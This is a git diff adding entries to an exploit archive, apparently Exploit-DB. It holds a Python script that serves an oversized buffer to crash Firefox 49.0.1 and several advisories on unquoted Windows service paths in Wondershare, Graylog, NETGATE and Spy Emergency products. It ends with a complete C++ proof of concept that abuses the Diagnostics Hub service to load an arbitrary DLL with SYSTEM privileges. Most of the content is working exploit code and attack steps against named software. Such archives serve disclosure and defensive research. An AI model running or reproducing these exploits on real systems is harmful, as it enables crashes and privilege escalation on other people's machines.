+ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20' +ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20' +ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20' +ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20' +ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20' +ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20' +ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c' +ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60' +ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e' +ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c' +ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f' +ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20' +ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77' +ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20' +ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20' +ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27' +ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f' +ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d' +ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20' +ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27' +ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20' +ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20' +ban+='\n' +ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n' +ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n' +print ban +print "please wait ...." +i=1 +while i <= 4120: + i+=1 + ban+=string.ascii_uppercase*250 + ban=ban +class Req(BaseHTTPRequestHandler): + def do_GET(self): + self.send_response(200) + self.send_header('Content-type','text/html') + self.end_headers() + self.wfile.write(''' + + Firefox 49.0.1 Vulnerability +
+

Firefox 49.0.1 Vulnerability

+

\x41\x75\x74\x68\x6f\x72\x3a\x20\x53\x75\x6c\x74\x61\x6e\x2d\x61\x6c\x62\x61\x6c\x61\x77\x69

+

\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n

+ '''+''+''' + 'helo firefox'CLICK + ''') +class runHTTP(HTTPServer): + def __init__(self,host,port): + ipadd=(host,port) + HTTPServer.__init__(self,ipadd,Req) +def createfile(): + global filecreate + filecreate = "Firefox.dat" + open(filecreate, "wb").write(ban) + print filecreate +createfile() +def start(): + global filecreate + ser=runHTTP(host,port) + print "http://{}:{}/{}".format(host,port,filecreate) + ser.serve_forever() +start() + diff --git a/platforms/windows/local/40535.txt b/platforms/windows/local/40535.txt new file mode 100755 index 000000000..ba4ba4097 --- /dev/null +++ b/platforms/windows/local/40535.txt @@ -0,0 +1,32 @@ +######################################################################### +# Exploit Title: Wondershare PDFelement Unquoted Service Path Privilege +Escalation +# Date: 10/14/2016 +# Author: Saeed Hasanzadeh (Net.Hun73r) +# Vendor Homepage: https://www.wondershare.com/ +# Software Link: +http://download.wondershare.com/inst/pdfelement_setup_full1042.exe +#version : 5.2.9 +# Tested on: Windows 7 +########################################################################## + +Wondershare PDFelement installs a service with an unquoted service path +To properly exploit this vulnerability, +the local attacker must insert an executable file in the path of the +service. +Upon service restart or system reboot, the malicious code will be run +with elevated privileges. +------------------------------------------- +C:\>sc qc WsAppService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: WsAppService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Wondershare\WAF\2.2.3.2\WsAppService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Wondershare Application Framework Service + DEPENDENCIES : RPCSS + SERVICE_START_NAME : LocalSystem diff --git a/platforms/windows/local/40538.txt b/platforms/windows/local/40538.txt new file mode 100755 index 000000000..d4fc0cfd6 --- /dev/null +++ b/platforms/windows/local/40538.txt @@ -0,0 +1,43 @@ +# Exploit Title: Graylog Collector Service Path Privilege Escalation +# Date: 10/14/2016 +# Exploit Author: Joey Lane +# Software Link: https://github.com/Graylog2/collector +# Version: 0.4.2 +# Tested on: Windows Server 2012 R2 + +Graylog Collector installs as a service with an unquoted service path. If +the user installs this service in a directory containing a space, this will +create a privilege escalation vulnerability. To properly exploit this +vulnerability, a local attacker can insert an executable file in the path +of the service. Rebooting the system or restarting the service will run +the malicious executable with elevated privileges. + + +This was tested on version 0.4.2, but may affect other versions as well. + + +--------------------------------------------------------------------------- + +C:\sc qc GraylogCollector +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: GraylogCollector + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\graylog collector\bin\windows\graylog-collector-service-x86.exe //RS//GraylogCollector + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Graylog Collector (GraylogCollector) + DEPENDENCIES : Tcpip + : Afd + SERVICE_START_NAME : LocalSystem + +--------------------------------------------------------------------------- + + +EXAMPLE: + +Using the BINARY_PATH_NAME listed above as an example, an executable named +"graylog.exe" could be placed in "C:\", and it would be executed as the +Local System user next time the service was restarted. diff --git a/platforms/windows/local/40539.txt b/platforms/windows/local/40539.txt new file mode 100755 index 000000000..6ff977a3e --- /dev/null +++ b/platforms/windows/local/40539.txt @@ -0,0 +1,32 @@ +######################################################################### +# Exploit Title: NETGATE Registry Cleaner Unquoted Service Path +Privilege Escalation +# Date: 15/10/2016 +# Author: Amir.ght +# Vendor Homepage: http://www.netgate.sk/ +# Software Link: +http://www.netgate.sk/download/download.php?id=4 +#version : build 16.0.205 (Latest) +# Tested on: Windows 7 +########################################################################## + +NETGATE Registry Cleaner installs a service with an unquoted service path +To properly exploit this vulnerability, +the local attacker must insert an executable file in the path of the service. +Upon service restart or system reboot, the malicious code will be run +with elevated privileges. +------------------------------------------- +C:\>sc qc NGRegClnSrv +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: NGRegClnSrv + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\NETGATE\Registry +Cleaner\RegistryCleanerSrv.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : NETGATE Registry Cleaner Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem diff --git a/platforms/windows/local/40540.txt b/platforms/windows/local/40540.txt new file mode 100755 index 000000000..fc1216890 --- /dev/null +++ b/platforms/windows/local/40540.txt @@ -0,0 +1,47 @@ +######################################################################### +# Exploit Title: NETGATE AMITI Antivirus Unquoted Service Path +Privilege Escalation +# Date: 15/10/2016 +# Author: Amir.ght +# Vendor Homepage: http://www.netgate.sk/ +# Software Link: +http://www.netgate.sk/download/download.php?id=11 +#version : build 23.0.305 (Latest) +# Tested on: Windows 7 +########################################################################## + +AMITI Antivirus installs two service with an unquoted service path +To properly exploit this vulnerability, +the local attacker must insert an executable file in the path of the service. +Upon service restart or system reboot, the malicious code will be run +with elevated privileges. +------------------------------------------- +C:\>sc qc AmitiAvSrv +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: AmitiAvSrv + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti +Antivirus\AmitiAntivirusSrv.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Amiti Antivirus Engine Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\>sc qc AmitiAvHealth +[SC] QueryServiceConfig SUCCESS +---------------------------------------------------- +SERVICE_NAME: AmitiAvHealth + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti +Antivirus\AmitiAntivirusHealth.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Amiti Antivirus Health Check + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem diff --git a/platforms/windows/local/40541.txt b/platforms/windows/local/40541.txt new file mode 100755 index 000000000..f4f1363f9 --- /dev/null +++ b/platforms/windows/local/40541.txt @@ -0,0 +1,31 @@ +######################################################################### +# Exploit Title: NETGATE Data Backup Unquoted Service Path Privilege Escalation +# Date: 15/10/2016 +# Author: Amir.ght +# Vendor Homepage: http://www.netgate.sk/ +# Software Link: +http://www.netgate.sk/download/download.php?id=5 +#version : build 3.0.605 (Latest) +# Tested on: Windows 7 +########################################################################## + +NETGATE Data Backup installs a service with an unquoted service path +To properly exploit this vulnerability, +the local attacker must insert an executable file in the path of the service. +Upon service restart or system reboot, the malicious code will be run +with elevated privileges. +------------------------------------------- +C:\>sc qc NGDatBckpSrv +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: NGDatBckpSrv + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\NETGATE\Data +Backup\DataBackupSrv.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : NETGATE Data Backup Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem diff --git a/platforms/windows/local/40550.txt b/platforms/windows/local/40550.txt new file mode 100755 index 000000000..797d6cf41 --- /dev/null +++ b/platforms/windows/local/40550.txt @@ -0,0 +1,45 @@ +######################################################################### +# Exploit Title: Spy Emergency Unquoted Service Path Privilege Escalation +# Date: 15/10/2016 +# Author: Amir.ght +# Vendor Homepage: http://www.spy-emergency.com/ +# Software Link: http://www.spy-emergency.com/download/download.php?id=1 +#version : build 23.0.205 (Latest) +# Tested on: Windows 7 +########################################################################## + +Spy Emergency installs two service with an unquoted service path +To properly exploit this vulnerability, +the local attacker must insert an executable file in the path of the service. +Upon service restart or system reboot, the malicious code will be run +with elevated privileges. +------------------------------------------- +C:\>sc qc SpyEmrgHealth +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: SpyEmrgHealth + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\NETGATE\Spy +Emergency\SpyEmergencyHealth.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Spy Emergency Health Check + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem +------------------------------------------------------------------ +C:\>sc qc SpyEmrgSrv +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: SpyEmrgSrv + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\NETGATE\Spy +Emergency\SpyEmergencySrv.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Spy Emergency Engine Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/platforms/windows/local/40562.cpp b/platforms/windows/local/40562.cpp new file mode 100755 index 000000000..62fd32c8f --- /dev/null +++ b/platforms/windows/local/40562.cpp @@ -0,0 +1,192 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=887 + +Windows: Diagnostics Hub DLL Load EoP +Platform: Windows 10 10586, not tested 8.1 Update 2 or Windows 7 +Class: Elevation of Privilege + +Summary: +The fix for CVE-2016-3231 is insufficient to prevent a normal user specifying an insecure agent path leading to arbitrary DLL loading at system privileges. + +Description: + +CVE-2016-3231 was an issue caused by passing a relative agent path name which allowed the DLL path loaded for the agent DLL to be redirected to another file. This seems to have been fixed and as far as I can tell this issue is no longer exploitable from a sandbox. However the problem is there’s an assumption that it’s not possible to write a file to the system32 directory, which technically is true but practically for this exploit false. + +As I’ve blogged about before, and also submitted bugs (for example MSRC-21233) a normal user can created named streams on directories as long as they have FILE_ADD_FILE access right to the directory. When you do this you create what looks from a path perspective to be in the parent. For example the system32\tasks folder is writable by a normal user, so you can copy a DLL to system32\tasks:abc.dll and when GetFullPathName is called the filename returned is tasks:abc.dll. When the GetValidAgentPath is called it checks if this file is in system32 by using GetFileAttributes, which succeeds and the service will proceed to load the file. + +On the fixing side of things, I can’t see an obvious reason why just checking for invalid path characters in the agent path wouldn’t be sufficient (and in fact would arguably have fixed the original bug as well). Of course I think it’s slightly dodgy that you’ll load any DLL from system32, even ones which aren’t agent DLLs. You’d have to find something which was somehow exploitable in a very short time window during DllMain but it might work. + +Also I wonder whether they’re any legitimate uses for named streams on NTFS directories? While it’s certainly out of scope perhaps they could only be created by admins? Or perhaps the access check shouldn’t be on the target directories but its parent directory where the effective file appears to be located. + +Proof of Concept: + +I’ve provided a PoC as a C++ source code file. You’ll also need a DLL to test load, I’ve not provided one of these but any should do, as long as it matches the bitness of the OS. + +1) Compile the C++ source code file. +2) Execute the poc passing the path to the DLL you want to load in the service as a normal user. +3) It should print that the DLL was loaded successfully. + +Expected Result: +The loading of a DLL fails as the path is rejected. + +Observed Result: +The DLL is loaded successfully. +*/ + + +// ExploitCollector.cpp : Defines the entry point for the console application. +// + +#include +#include +#include +#include +#include + +GUID CLSID_CollectorService = + { 0x42CBFAA7, 0xA4A7, 0x47BB,{ 0xB4, 0x22, 0xBD, 0x10, 0xE9, 0xD0, 0x27, 0x00, } }; + +class __declspec(uuid("f23721ef-7205-4319-83a0-60078d3ca922")) ICollectionSession : public IUnknown { +public: + + virtual HRESULT __stdcall PostStringToListener(REFGUID, LPWSTR) = 0; + virtual HRESULT __stdcall PostBytesToListener() = 0; + virtual HRESULT __stdcall AddAgent(LPWSTR path, REFGUID) = 0; + //.rdata:0000000180035868 dq offset ? Start@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Start(tagVARIANT *) + //.rdata:0000000180035870 dq offset ? GetCurrentResult@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJFPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetCurrentResult(short, tagVARIANT *) + //.rdata:0000000180035878 dq offset ? Pause@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJXZ; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Pause(void) + //.rdata:0000000180035880 dq offset ? Resume@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJXZ; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Resume(void) + //.rdata:0000000180035888 dq offset ? Stop@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Stop(tagVARIANT *) + //.rdata:0000000180035890 dq offset ? TriggerEvent@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJW4SessionEvent@@PEAUtagVARIANT@@11@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::TriggerEvent(SessionEvent, tagVARIANT *, tagVARIANT *, tagVARIANT *) + //.rdata:0000000180035898 dq offset ? GetGraphDataUpdates@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJAEBU_GUID@@PEAUtagSAFEARRAY@@PEAUGraphDataUpdates@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetGraphDataUpdates(_GUID const &, tagSAFEARRAY *, GraphDataUpdates *) + //.rdata:00000001800358A0 dq offset ? QueryState@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAW4SessionState@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::QueryState(SessionState *) + //.rdata:00000001800358A8 dq offset ? GetStatusChangeEventName@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAPEAG@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetStatusChangeEventName(ushort * *) + //.rdata:00000001800358B0 dq offset ? GetLastError@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAJ@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetLastError(long *) + //.rdata:00000001800358B8 dq offset ? SetClientDelegate@EtwCollectionSession@StandardCollector@DiagnosticsHub@Mic +}; + +struct SessionConfiguration +{ + DWORD version; // Needs to be 1 + DWORD a1; // Unknown + DWORD something; // Also unknown + DWORD monitor_pid; + GUID guid; + BSTR path; // Path to a valid directory + CHAR trailing[256]; +}; + +class __declspec(uuid("7e912832-d5e1-4105-8ce1-9aadd30a3809")) IStandardCollectorClientDelegate : public IUnknown +{ +}; + +class __declspec(uuid("0d8af6b7-efd5-4f6d-a834-314740ab8caa")) IStandardCollectorService : public IUnknown +{ +public: + virtual HRESULT __stdcall CreateSession(SessionConfiguration *, IStandardCollectorClientDelegate *, ICollectionSession **) = 0; + virtual HRESULT __stdcall GetSession(REFGUID, ICollectionSession **) = 0; + virtual HRESULT __stdcall DestroySession(REFGUID) = 0; + virtual HRESULT __stdcall DestroySessionAsync(REFGUID) = 0; + virtual HRESULT __stdcall AddLifetimeMonitorProcessIdForSession(REFGUID, int) = 0; +}; + +_COM_SMARTPTR_TYPEDEF(IStandardCollectorService, __uuidof(IStandardCollectorService)); +_COM_SMARTPTR_TYPEDEF(ICollectionSession, __uuidof(ICollectionSession)); + +class CoInit +{ +public: + CoInit() { + CoInitialize(nullptr); + } + + ~CoInit() { + CoUninitialize(); + } +}; + +void ThrowOnError(HRESULT hr) +{ + if (hr != 0) + { + throw _com_error(hr); + } +} + +int wmain(int argc, wchar_t** argv) +{ + if (argc < 2) + { + printf("poc path\\to\\dll\n"); + return 1; + } + + CoInit coinit; + try + { + GUID name; + CoCreateGuid(&name); + LPOLESTR name_str; + StringFromIID(name, &name_str); + + WCHAR random_name[MAX_PATH]; + StringCchPrintf(random_name, MAX_PATH, L"tasks:%ls.dll", name_str); + + WCHAR target[MAX_PATH]; + GetSystemDirectory(target, MAX_PATH); + StringCchCat(target, MAX_PATH, L"\\"); + StringCchCat(target, MAX_PATH, random_name); + + WCHAR valid_dir[MAX_PATH]; + GetModuleFileName(nullptr, valid_dir, MAX_PATH); + WCHAR* p = wcsrchr(valid_dir, L'\\'); + *p = 0; + StringCchCat(valid_dir, MAX_PATH, L"\\etw"); + CreateDirectory(valid_dir, nullptr); + + if (!CopyFile(argv[1], target, FALSE)) + { + printf("Error copying file %d\n", GetLastError()); + return 1; + } + + IStandardCollectorServicePtr service; + ThrowOnError(CoCreateInstance(CLSID_CollectorService, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&service))); + DWORD authn_svc; + DWORD authz_svc; + LPOLESTR principal_name; + DWORD authn_level; + DWORD imp_level; + RPC_AUTH_IDENTITY_HANDLE identity; + DWORD capabilities; + + ThrowOnError(CoQueryProxyBlanket(service, &authn_svc, &authz_svc, &principal_name, &authn_level, &imp_level, &identity, &capabilities)); + ThrowOnError(CoSetProxyBlanket(service, authn_svc, authz_svc, principal_name, authn_level, RPC_C_IMP_LEVEL_IMPERSONATE, identity, capabilities)); + SessionConfiguration config = {}; + config.version = 1; + config.monitor_pid = ::GetCurrentProcessId(); + CoCreateGuid(&config.guid); + bstr_t path = valid_dir; + config.path = path; + ICollectionSessionPtr session; + + ThrowOnError(service->CreateSession(&config, nullptr, &session)); + GUID agent_guid; + CoCreateGuid(&agent_guid); + ThrowOnError(session->AddAgent(random_name, agent_guid)); + } + catch (const _com_error& error) + { + if (error.Error() == 0x8007045A) + { + printf("DLL should have been loaded\n"); + } + else + { + printf("%ls\n", error.ErrorMessage()); + printf("%08X\n", error.Error()); + } + } + + return 0; +} \ No newline at end of file